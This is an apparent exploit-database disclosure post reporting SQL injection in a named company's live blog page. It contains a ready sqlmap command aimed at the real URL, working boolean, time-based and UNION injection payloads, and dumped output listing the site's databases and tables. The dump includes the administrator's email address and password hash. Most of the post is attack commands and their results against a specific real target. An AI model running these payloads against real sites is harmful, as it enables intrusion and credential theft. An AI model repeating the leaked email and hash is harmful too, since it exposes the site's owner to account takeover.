Bluetooth Low Energy (BLE) USB Dongle | SQL Injection

2021.07.21
tr 0x01369 (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: BleuIO - Bluetooth Low Energy (BLE) USB Dongle | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "https://www.bleuio.com/blog/details.php?id=932" --dbs --batch --------------------------------------------------------------------------------------------------- .com Commercial BleuIO - Bluetooth Low Energy (BLE) USB Dongle https://www.bleuio.com/blog/details.php?id=932 --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=932 AND 4987=4987 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=932 AND (SELECT 7660 FROM (SELECT(SLEEP(5)))zddA) Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=-6397 UNION ALL SELECT NULL,NULL,CONCAT(0x716b787671,0x745168597449744c6279465a6a574f7a7846646c686148795171645856615567797a70544e41764f,0x7176707a71),NULL,NULL-- - --- the back-end DBMS is MySQL web server operating system: Linux Ubuntu 18.04 (bionic) web application technology: Apache 2.4.29 the back-end DBMS operating system: Linux Ubuntu the back-end DBMS: MySQL >= 5.0.12 banner: '5.7.33-0ubuntu0.18.04.1' available databases [3]: [+] information_schema [+] smart_db05 [+] test Database: smart_db05 [24 tables] +----------------------------+ | ssd_aiowps_events | | ssd_aiowps_failed_logins | | ssd_aiowps_global_meta | | ssd_aiowps_login_activity | | ssd_aiowps_login_lockdown | | ssd_aiowps_permanent_block | | ssd_commentmeta | | ssd_comments | | ssd_links | | ssd_options | | ssd_postmeta | | ssd_posts | | ssd_redirection_404 | | ssd_redirection_groups | | ssd_redirection_items | | ssd_redirection_logs | | ssd_term_relationships | | ssd_term_taxonomy | | ssd_termmeta | | ssd_terms | | ssd_usermeta | | ssd_users | | ssd_yoast_seo_links | | ssd_yoast_seo_meta | +----------------------------+ Database: smart_db05 Table: ssd_users [1 entry] +----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+ | ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key | +----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+ | 1 | <blank> | $P$BVCY5ZyykfMnm8e4Qr4zIM2vdvborE/ | shuhadz@hotmail.com | ssdAdmin | 0 | ssdAdmin | ssdadmin | 2020-03-23 10:10:38 | <blank> | +----+----------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

References:

0x01369


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top